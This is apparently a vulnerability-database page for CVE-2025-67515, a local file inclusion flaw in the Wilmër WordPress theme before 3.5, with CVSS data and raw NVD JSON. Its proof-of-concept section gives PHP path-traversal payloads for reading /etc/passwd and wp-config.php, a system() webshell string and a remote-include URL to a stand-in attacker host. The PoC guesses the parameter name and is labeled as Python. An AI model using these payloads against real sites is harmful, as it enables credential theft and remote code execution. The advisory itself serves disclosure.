Security Vulnerability Report
中文
CVE-2025-67515 CVSS 8.8 HIGH

CVE-2025-67515

Published: 2025-12-09 16:18:24
Last Modified: 2026-04-27 18:16:40

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wilmër wilmer allows PHP Local File Inclusion.This issue affects Wilmër: from n/a through < 3.5.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qodeinteractive:wilmer:*:*:*:*:*:wordpress:*:* - VULNERABLE
Wilmër主题 < 3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-67515 PoC - Wilmër Theme Local File Inclusion * Target: Mikado-Themes Wilmër WordPress Theme < 3.5 * Author: Security Researcher * Note: For authorized security testing only */ // LFI via vulnerable parameter (example - actual parameter name varies) $poc_url = 'http://target-wordpress-site.com/wp-content/themes/wilmer/'; // Read sensitive files $targets = [ '/etc/passwd' => 'file=/../../../../etc/passwd', '/wp-config.php' => 'file=/../../wp-config.php', '/etc/hosts' => 'file=/../../../../etc/hosts' ]; foreach ($targets as $description => $payload) { $url = $poc_url . '?' . $payload; echo "[*] Testing: $description\n"; $response = file_get_contents($url); if (strpos($response, 'root:') !== false || strpos($response, '<?php') !== false) { echo "[+] Vulnerable! File content leaked:\n"; echo substr($response, 0, 500) . "\n\n"; } } // RCE chain if allow_url_include is enabled $webshell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'; $remote_include = $poc_url . '?file=http://attacker-server.com/malicious.txt'; echo "[*] For RCE (if allow_url_include=on): $remote_include\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67515", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:24.407", "lastModified": "2026-04-27T18:16:39.930", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wilmër wilmer allows PHP Local File Inclusion.This issue affects Wilmër: from n/a through < 3.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qodeinteractive:wilmer:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "3.5", "matchCriteriaId": "A4EB3182-22F5-4F8E-9CCC-58927FF02D7C"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/wilmer/vulnerability/wordpress-wilmer-theme-3-5-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}